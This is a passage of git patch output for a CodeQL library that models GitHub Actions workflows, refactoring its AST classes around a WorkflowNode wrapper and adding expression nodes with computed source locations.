"composite" + n instanceof YamlDocument and + n instanceof YamlMapping and + this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = + "composite" } /** Gets the `runs` mapping. */ - Runs getRuns() { result = super.lookup("runs") } + Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { super.lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - super.lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } @@ -99,34 +145,43 @@ class CompositeAction extends AstNode instanceof YamlDocument, YamlMapping { * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends AstNode instanceof YamlMapping { +class Runs extends WorkflowNode { CompositeAction action; - Runs() { action.(YamlMapping).lookup("runs") = this } + Runs() { + n instanceof YamlMapping and + action.asYamlMapping().lookup("runs") = this.asYamlNode() + } /** Gets the action that this `runs` mapping is in. */ CompositeAction getAction() { result = action } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends AstNode instanceof YamlDocument, YamlMapping { +class Workflow extends WorkflowNode { + Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } + /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = super.lookup("jobs") } + YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result = super.lookup("env") } + WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } /** Gets the name of the workflow. */ - string getName() { result = super.lookup("name").(YamlString).getValue() } + string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } /** Gets the job within this workflow with the given job ID. */ Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } @@ -135,107 +190,128 @@ class Workflow extends AstNode instanceof YamlDocument, YamlMapping { Job getAJob() { result = this.getJob(_) } predicate hasTriggerEvent(string trigger) { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(trigger)) + exists(YamlNode y | + y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) + ) } string getATriggerEvent() { - exists(YamlNode n | n = super.lookup("on").(YamlMappingLikeNode).getNode(result)) + exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } } -class ReusableWorkflow extends Workflow instanceof YamlMapping { +class ReusableWorkflow extends Workflow { YamlValue workflow_call; ReusableWorkflow() { - super.lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call + n instanceof YamlMapping and + this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call } - Outputs getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } - Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) } + Input getAnInput() { + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) + } Input getInput(string name) { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result, _) and - result.(YamlString).getValue() = name + workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and + result.asYamlNode().(YamlString).getValue() = name } } -class Input extends AstNode { +class Input extends WorkflowNode { YamlMapping parent; - Input() { parent.lookup("inputs").(YamlMapping).maps(this, _) } + Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } } -class Outputs extends AstNode instanceof YamlMapping { +class Outputs extends WorkflowNode { YamlMapping parent; - Outputs() { parent.lookup("outputs") = this } + Outputs() { + n instanceof YamlMapping and + parent.lookup("outputs") = this.asYamlNode() + } /** * Gets an output expression. */ StringLiteral getAnOutput() { - super.lookup(_).(YamlMapping).lookup("value") = result or - super.lookup(_) = result + this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(_) = result.asYamlNode() } /** * Gets a specific output expression by name. */ StringLiteral getOutput(string name) { - super.lookup(name).(YamlMapping).lookup("value") = result or - super.lookup(name) = result + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or + this.asYamlMapping().lookup(name) = result.asYamlNode() } - string getAnOutputName() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = result), _) } + string getAnOutputName() { + this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) + } override string toString() { result = "Job outputs node" } } -class Permissions extends AstNode instanceof YamlMapping { +class Permissions extends WorkflowNode { YamlMapping parent; - Permissions() { parent.lookup("permissions") = this } + Permissions() { + n instanceof YamlMapping and + parent.lookup("permissions") = this.asYamlNode() + } } -class Strategy extends AstNode instanceof YamlMapping { +class Strategy extends WorkflowNode { YamlMapping parent; - Strategy() { parent.lookup("strategy") = this } + Strategy() { + n instanceof YamlMapping and + parent.lookup("strategy") = this.asYamlNode() + } /** * Gets a specific matric expression (YamlMapping) by name. */ StringLiteral getMatrixVar(string name) { - super.lookup("matrix").(YamlMapping).lookup(name) = result + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { super.lookup("matrix").(YamlMapping).lookup(_) = result } + StringLiteral getAMatrixVar() { + this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() + } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends AstNode instanceof YamlMappingLikeNode { +class Needs extends WorkflowNode { Job job; - Needs() { job.(YamlMapping).lookup("needs") = this } + Needs() { + n instanceof YamlMappingLikeNode and + job.asYamlMapping().lookup("needs") = this.asYamlNode() + } Job getJob() { result = job } Job getANeededJob() { - result.getId() = super.getNode(_).(YamlString).getValue() and + result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and result.getLocation().getFile() = job.getLocation().getFile() // if this instanceof YamlString // then @@ -254,11 +330,14 @@ class Needs extends AstNode instanceof YamlMappingLikeNode { * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends AstNode instanceof YamlMapping { +class Job extends WorkflowNode { string jobId; Workflow workflow; - Job() { this = workflow.getJobs().lookup(jobId) } + Job() { + n instanceof YamlMapping and + this.asYamlNode() = workflow.getJobs().lookup(jobId) + } /** * Gets the ID of this job, as a string. @@ -267,10 +346,14 @@ class Job extends AstNode instanceof YamlMapping { string getId() { result = jobId } /** Gets any steps that are defined within this job. */ - Step getAStep() { result = super.lookup("steps").(YamlSequence).getElementNode(_) } + Step getAStep() { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) + } /** Gets the step at the given index within this job. */ - Step getStep(int i) { result = super.lookup("steps").(YamlSequence).getElementNode(i) } + Step getStep(int i) { + result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) + } /** Gets the workflow this job belongs to. */ Workflow getWorkflow() { result = workflow } @@ -293,7 +376,7 @@ class Job extends AstNode instanceof YamlMapping { * out1: ${steps.foo.bar} * out2: ${steps.foo.baz} */ - Outputs getOutputs() { result = super.lookup("outputs") } + Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } @@ -310,14 +393,14 @@ class Job extends AstNode instanceof YamlMapping { UsesJob getUses() { result.getJob() = this } predicate usesReusableWorkflow() { - this.(YamlMapping).maps(any(YamlString s | s.getValue() = "uses"), _) + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) } - If getIf() { result = super.lookup("if") } + If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } - Permissions getPermissions() { result = super.lookup("permissions") } + Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - Strategy getStrategy() { result = super.lookup("strategy") } + Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } override string toString() { result = "Job: " + jobId } } @@ -326,41 +409,41 @@ class Job extends AstNode instanceof YamlMapping { * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends AstNode instanceof YamlMapping { +class Step extends WorkflowNode { YamlMapping parent; - Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this } + Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() } /** Gets the ID of this step, if any. */ - string getId() { result = super.lookup("id").(YamlString).getValue() } + string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() } /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result = parent } + Job getJob() { result.asYamlNode() = parent } /** Gets the value of the `if` field in this step, if any. */ - If getIf() { result = super.lookup("if") } + If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } } /** * An If node representing a conditional statement. */ -class If extends AstNode { - YamlMapping parent; +class If extends WorkflowNode { + WorkflowNode parent; If() { (parent instanceof Step or parent instanceof Job) and - parent.lookup("if") = this + parent.asYamlMapping().lookup("if") = this.asYamlNode() } - AstNode getEnclosingNode() { result = parent } + WorkflowNode getEnclosingNode() { result = parent } - string getCondition() { result = this.(YamlScalar).getValue() } + string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() } } /** * Abstract class representing a call to a 3rd party action or reusable workflow. */ -abstract class Uses extends AstNode { +abstract class Uses extends WorkflowNode { abstract string getCallee(); abstract string getVersion(); @@ -385,7 +468,7 @@ private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } class UsesStep extends Step, Uses { YamlScalar uses; - UsesStep() { this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = "uses"), uses) } + UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ override string getCallee() { @@ -400,7 +483,7 @@ class UsesStep extends Step, Uses { override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } override StringLiteral getArgument(string key) { - result = this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) + result.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) } override string toString() { @@ -411,8 +494,11 @@ class UsesStep extends Step, Uses { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class UsesJob extends Uses instanceof YamlMapping { - UsesJob() { this instanceof Job and this.maps(any(YamlString s | s.getValue() = "uses"), _) } +class UsesJob extends Uses { + UsesJob() { + this instanceof Job and + this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) + } Job getJob() { result = this } @@ -428,7 +514,7 @@ class UsesJob extends Uses instanceof YamlMapping { override string getCallee() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if name.getValue().matches("./%") then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else @@ -442,7 +528,7 @@ class UsesJob extends Uses instanceof YamlMapping { /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { exists(YamlString name | - super.lookup("uses") = name and + this.asYamlMapping().lookup("uses") = name and if not name.getValue().matches("\\.%") then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() @@ -450,7 +536,7 @@ class UsesJob extends Uses instanceof YamlMapping { } override StringLiteral getArgument(string key) { - super.lookup("with").(YamlMapping).lookup(key) = result + this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = result.asYamlNode() } } @@ -461,7 +547,7 @@ class UsesJob extends Uses instanceof YamlMapping { class Run extends Step { StringLiteral script; - Run() { this.(YamlMapping).maps(any(YamlString s | s.getValue() = "run"), script) } + Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } StringLiteral getScript() { result = script } @@ -473,18 +559,19 @@ class Run extends Step { /** * A YamlString part of a YamlSequence or YamlMapping values. */ -class StringLiteral extends AstNode instanceof YamlString { +class StringLiteral extends WorkflowNode { StringLiteral() { + n instanceof YamlString and exists(YamlCollection c | c instanceof YamlMapping and - c.(YamlMapping).maps(_, this) + c.(YamlMapping).maps(_, this.asYamlNode()) or c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this + c.(YamlSequence).getElementNode(_) = this.asYamlNode() ) } - string getValue() { result = this.(YamlString).getValue() } + string getValue() { result = this.asYamlNode().(YamlString).getValue() } } /** @@ -508,7 +595,7 @@ string getASimpleReferenceExpression(YamlString node) { class Expression extends StringLiteral { string expr; - Expression() { expr = getASimpleReferenceExpression(this) } + Expression() { expr = getASimpleReferenceExpression(this.asYamlNode()) } string getExpression() { result = expr } @@ -529,7 +616,7 @@ class ContextExpression extends Expression { abstract string getFieldName(); - abstract AstNode getTarget(); + abstract WorkflowNode getTarget(); } private string stepsCtxRegex() { @@ -574,7 +661,7 @@ class StepsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { this.getLocation().getFile() = result.getLocation().getFile() and result.(Step).getId() = stepId } @@ -601,7 +688,7 @@ class NeedsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { neededJob.getLocation().getFile() = this.getLocation().getFile() and this.getJob().getANeededJob() = neededJob and ( @@ -631,7 +718,7 @@ class JobsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Job job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and @@ -655,7 +742,7 @@ class InputsExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { result.getLocation().getFile() = this.getLocation().getFile() and ( exists(ReusableWorkflow w | w.getInput(fieldName) = result) @@ -680,8 +767,8 @@ class EnvExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { - exists(AstNode s | + override WorkflowNode getTarget() { + exists(WorkflowNode s | s.getEnvVar(fieldName) = result and s.getAChildNode*() = this ) @@ -703,7 +790,7 @@ class MatrixExpression extends ContextExpression { override string getFieldName() { result = fieldName } - override AstNode getTarget() { + override WorkflowNode getTarget() { exists(Workflow w | w.getStrategy().getMatrixVar(fieldName) = result and w.getAChildNode*() = this From 96246f4b74cd050d2f9b919e9aadf7f626de6041 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 7 Mar 2024 15:35:47 +0100 Subject: [PATCH 0087/1267] Add Expression nodes and their corresponding locations --- .gitignore | 1 + ql/lib/codeql/Locations.qll | 59 ++- ql/lib/codeql/actions/Ast.qll | 353 ++++++++----- ql/lib/codeql/actions/ast/internal/Yaml.qll | 9 +- .../actions/controlflow/internal/Cfg.qll | 27 +- .../codeql/actions/dataflow/ExternalFlow.qll | 10 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 12 +- .../dataflow/internal/DataFlowPublic.qll | 4 +- ...el.yml => actions_github-script.model.yml} | 4 +- .../Security/CWE-020/CompositeActionsSinks.ql | 2 +- .../CWE-020/CompositeActionsSources.ql | 2 +- .../CWE-020/CompositeActionsSummaries.ql | 2 +- .../CWE-020/ReusableWorkflowsSinks.ql | 2 +- .../CWE-020/ReusableWorkflowsSources.ql | 2 +- .../CWE-020/ReusableWorkflowsSummaries.ql | 2 +- .../CWE-094/CriticalExpressionInjection.ql | 5 +- .../Security/CWE-094/ExpressionInjection.ql | 5 +- ql/src/Security/CWE-829/UntrustedCheckout.ql | 3 +- .../.github/workflows/expression_nodes.yml | 22 + ql/test/library-tests/test.expected | 250 ++++++++- ql/test/library-tests/test.ql | 8 +- .../CWE-020/CompositeActionsSinks.expected | 18 +- .../CWE-020/CompositeActionsSources.expected | 12 +- .../CompositeActionsSummaries.expected | 12 +- .../CWE-020/ReusableWorkflowsSinks.expected | 6 +- .../CWE-020/ReusableWorkflowsSources.expected | 12 +- .../ReusableWorkflowsSummaries.expected | 18 +- .../.github/workflows/comment_issue.yml | 4 +- .../workflows/comment_issue_newline.yml | 4 +- .../CriticalExpressionInjection.expected | 463 ++++++++--------- .../CWE-094/ExpressionInjection.expected | 480 +++++++++--------- 32 files changed, 1113 insertions(+), 702 deletions(-) rename ql/lib/ext/{PLACEHOLDER.model.yml => actions_github-script.model.yml} (57%) create mode 100644 ql/test/library-tests/.github/workflows/expression_nodes.yml diff --git a/.gitignore b/.gitignore index 6c0e5c58738..1127e8f55db 100644 --- a/.gitignore +++ b/.gitignore @@ -3,3 +3,4 @@ ql/lib/.codeql/ ql/src/.codeql/ ql/test/.codeql/ +db/ diff --git a/ql/lib/codeql/Locations.qll b/ql/lib/codeql/Locations.qll index 3a16bdec40d..33a8eba30ac 100644 --- a/ql/lib/codeql/Locations.qll +++ b/ql/lib/codeql/Locations.qll @@ -1,6 +1,7 @@ /** Provides classes for working with locations. */ import files.FileSystem +import codeql.actions.Ast bindingset[loc] pragma[inline_late] @@ -11,30 +12,57 @@ private string locationToString(Location loc) { ) } +newtype TLocation = + TBaseLocation(string filepath, int startline, int startcolumn, int endline, int endcolumn) { + exists(File file | + file.getAbsolutePath() = filepath and + locations_default(_, file, startline, startcolumn, endline, endcolumn) + ) + or + exists(ExpressionNode e | + e.hasLocationInfo(filepath, startline, startcolumn, endline, endcolumn) + ) + or + filepath = "" and startline = 0 and startcolumn = 0 and endline = 0 and endcolumn = 0 + } + /** * A location as given by a file, a start line, a start column, * an end line, and an end column. * * For more information about locations see [Locations](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ -class Location extends @location_default { +class Location extends TLocation, TBaseLocation { + string filepath; + int startline; + int startcolumn; + int endline; + int endcolumn; + + Location() { this = TBaseLocation(filepath, startline, startcolumn, endline, endcolumn) } + /** Gets the file for this location. */ - File getFile() { locations_default(this, result, _, _, _, _) } + File getFile() { + exists(File file | + file.getAbsolutePath() = filepath and + result = file + ) + } /** Gets the 1-based line number (inclusive) where this location starts. */ - int getStartLine() { locations_default(this, _, result, _, _, _) } + int getStartLine() { result = startline } /** Gets the 1-based column number (inclusive) where this location starts. */ - int getStartColumn() { locations_default(this, _, _, result, _, _) } + int getStartColumn() { result = startcolumn } - /** Gets the 1-based line number (inclusive) where this location ends. */ - int getEndLine() { locations_default(this, _, _, _, result, _) } + /** Gets the 1-based line number (inclusive) where this.getLocationDefault() location ends. */ + int getEndLine() { result = endline } - /** Gets the 1-based column number (inclusive) where this location ends. */ - int getEndColumn() { locations_default(this, _, _, _, _, result) } + /** Gets the 1-based column number (inclusive) where this.getLocationDefault() location ends. */ + int getEndColumn() { result = endcolumn } /** Gets the number of lines covered by this location. */ - int getNumLines() { result = this.getEndLine() - this.getStartLine() + 1 } + int getNumLines() { result = endline - startline + 1 } /** Gets a textual representation of this element. */ pragma[inline] @@ -47,13 +75,12 @@ class Location extends @location_default { * For more information, see * [Providing locations in CodeQL queries](https://codeql.github.com/docs/writing-codeql-queries/providing-locations-in-codeql-queries/). */ - predicate hasLocationInfo( - string filepath, int startline, int startcolumn, int endline, int endcolumn - ) { - exists(File f | - locations_default(this, f, startline, startcolumn, endline, endcolumn) and - filepath = f.getAbsolutePath() - ) + predicate hasLocationInfo(string p, int sl, int sc, int el, int ec) { + p = filepath and + sl = startline and + sc = startcolumn and + el = endline and + ec = endcolumn } /** Holds if this location starts strictly before the specified location. */ diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 1d86d81a063..21d4f052e13 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -3,7 +3,9 @@ private import codeql.Locations newtype TAstNode = TWorflowNode(YamlNode n) or - TExpressionNode() + TExpressionNode(StringValue n, string expression, int exprOffset) { + expression = getASimpleReferenceExpression(n, exprOffset) + } class AstNode extends TAstNode { abstract AstNode getAChildNode(); @@ -12,21 +14,160 @@ class AstNode extends TAstNode { abstract string getAPrimaryQlClass(); + abstract string toString(); + abstract Location getLocation(); - abstract string toString(); + abstract File getFile(); + + /** + * Gets the enclosing workflow statement. + */ + Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionNode getInScopeEnvVarExpr(string name) { + exists(StringValue l, Env env | + env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), l.asYamlNode()) and + l.getAnExpression() = result + | + env.(StepEnv).getStep().getAChildNode*() = this + or + env.(JobEnv).getJob().getAChildNode*() = this + or + env.(WorkflowEnv).getWorkflow().getAChildNode*() = this + ) + } } class ExpressionNode extends AstNode, TExpressionNode { - override string toString() { result = "expression node" } + StringValue n; + string rawExpression; + string expression; + int exprOffset; + + ExpressionNode() { + this = TExpressionNode(n, rawExpression, exprOffset - 1) and + expression = + rawExpression.regexpCapture("\\$\\{\\{\\s*([A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+)\\s*\\}\\}", 1) + } + + override string toString() { result = expression } override AstNode getAChildNode() { none() } - override AstNode getParentNode() { none() } + override AstNode getParentNode() { result = n } override string getAPrimaryQlClass() { result = "ExpressionNode" } - override Location getLocation() { none() } + string getExpression() { result = expression } + + string getRawExpression() { result = rawExpression } + + Job getJob() { result.getAChildNode*() = n } + + int lineLength(int idx) { + exists(string line | line = n.getValue().splitAt("\n", idx) and result = line.length() + 1) + } + + bindingset[i] + int unboundPartialLineLengthSum(int i) { + result = sum(int j, int length | j in [0 .. i] and length = this.lineLength(j) | length) + } + + int partialLineLengthSum(int i) { + i in [0 .. count(n.getValue().splitAt("\n"))] and + result = this.unboundPartialLineLengthSum(i) + } + + predicate expressionOffsets(int sl, int sc, int el, int ec) { + exists(int lineDiff, string style, Location loc | + loc = n.asYamlNode().getLocation() and + lineDiff = loc.getEndLine() - loc.getStartLine() and + style = n.asYamlNode().(YamlString).getStyle() + | + // eg: + // - run: echo "hello" + // - run: 'echo "hello"' + // - run: "echo 'hello'" + style = ["", "\"", "'"] and + lineDiff = 0 and + sl = loc.getStartLine() and + el = sl and + sc = loc.getStartColumn() + exprOffset and + ec = sc + rawExpression.length() - 1 + or + // eg: + // - run: "echo 'hello' + // echo 'hello'" + // - run: "echo 'hello' + // echo 'hello' + // echo 'hello'" + style = ["", "\"", "'"] and + lineDiff > 0 and + sl = loc.getStartLine() and + el = loc.getEndLine() and + sc = loc.getStartColumn() and + ec = loc.getEndColumn() + or + // eg: + // - run: | + // echo "hello" + // - run: | + // echo "hello" + // echo "bye" + style = "|" and + exists(int r | + ( + r > 0 and + this.partialLineLengthSum(r - 1) < exprOffset and + this.partialLineLengthSum(r) >= exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = + n.getKeyNode().getLocation().getStartColumn() + exprOffset - + this.partialLineLengthSum(r - 1) + 2 - 1 and + ec = sc + rawExpression.length() - 1 + or + r = 0 and + this.partialLineLengthSum(r) > exprOffset and + sl = loc.getStartLine() + r + 1 and + el = sl and + sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and + ec = sc + rawExpression.length() - 1 + ) + ) + or + // eg: + // - run: > + // echo "hello" + // - run: > + // echo "hello" + // echo "hello" + style = ">" and + sl = loc.getStartLine() + 1 and + el = loc.getEndLine() and + sc = n.getKeyNode().getLocation().getStartColumn() and + ec = loc.getEndColumn() + ) + } + + override Location getLocation() { + exists(Location loc | + this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), + loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and + result = loc + ) + } + + predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { + path = n.asYamlNode().getFile().getAbsolutePath() and + this.expressionOffsets(sl, sc, el, ec) + } + + override File getFile() { result = n.asYamlNode().getFile() } } /** @@ -39,37 +180,23 @@ class WorkflowNode extends AstNode, TWorflowNode { override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - override AstNode getAChildNode() { result = TWorflowNode(n.getAChildNode()) } + override AstNode getAChildNode() { + result = TWorflowNode(n.getAChildNode()) + or + exists(ExpressionNode e | e.getParentNode() = this | result = e) + } override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } override Location getLocation() { result = n.getLocation() } - override string toString() { result = n.toString() } - - /** - * Gets the enclosing workflow statement. - */ - Workflow getEnclosingWorkflow() { this = result.getAChildNode*() } - - /** - * Gets a environment variable expression by name in the scope of the current node. - */ - StringLiteral getEnvVar(string name) { - exists(Env env | - env.asYamlMapping().maps(any(YamlScalar s | s.getValue() = name), result.asYamlNode()) - | - env.(StepEnv).getStep().getAChildNode*() = this - or - env.(JobEnv).getJob().getAChildNode*() = this - or - env.(WorkflowEnv).getWorkflow().getAChildNode*() = this - ) - } + override File getFile() { result = n.getFile() } YamlNode asYamlNode() { result = n } YamlMapping asYamlMapping() { result = n } + + override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ @@ -117,7 +244,7 @@ class CompositeAction extends WorkflowNode { CompositeAction() { n instanceof YamlDocument and n instanceof YamlMapping and - this.getLocation().getFile().getBaseName() = ["action.yml", "action.yaml"] and + this.getFile().getBaseName() = ["action.yml", "action.yaml"] and this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" } @@ -127,9 +254,9 @@ class CompositeAction extends WorkflowNode { Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) @@ -214,9 +341,9 @@ class ReusableWorkflow extends Workflow { Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } - StringLiteral getAnOutput() { result = this.getOutputs().getAnOutput() } + ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - StringLiteral getOutput(string name) { result = this.getOutputs().getOutput(name) } + ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } Input getAnInput() { workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) @@ -245,17 +372,19 @@ class Outputs extends WorkflowNode { /** * Gets an output expression. */ - StringLiteral getAnOutput() { - this.asYamlMapping().lookup(_).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(_) = result.asYamlNode() - } + ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } /** * Gets a specific output expression by name. */ - StringLiteral getOutput(string name) { - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = result.asYamlNode() or - this.asYamlMapping().lookup(name) = result.asYamlNode() + ExpressionNode getOutputExpr(string name) { + exists(StringValue l | + l.getAnExpression() = result and + ( + this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or + this.asYamlMapping().lookup(name) = l.asYamlNode() + ) + ) } string getAnOutputName() { @@ -285,14 +414,14 @@ class Strategy extends WorkflowNode { /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getMatrixVar(string name) { + StringValue getMatrixVar(string name) { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() } /** * Gets a specific matric expression (YamlMapping) by name. */ - StringLiteral getAMatrixVar() { + StringValue getAMatrixVar() { this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() } } @@ -312,17 +441,7 @@ class Needs extends WorkflowNode { Job getANeededJob() { result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getLocation().getFile() = job.getLocation().getFile() - // if this instanceof YamlString - // then - // result.getId() = this.(YamlString).getValue() and - // result.getLocation().getFile() = 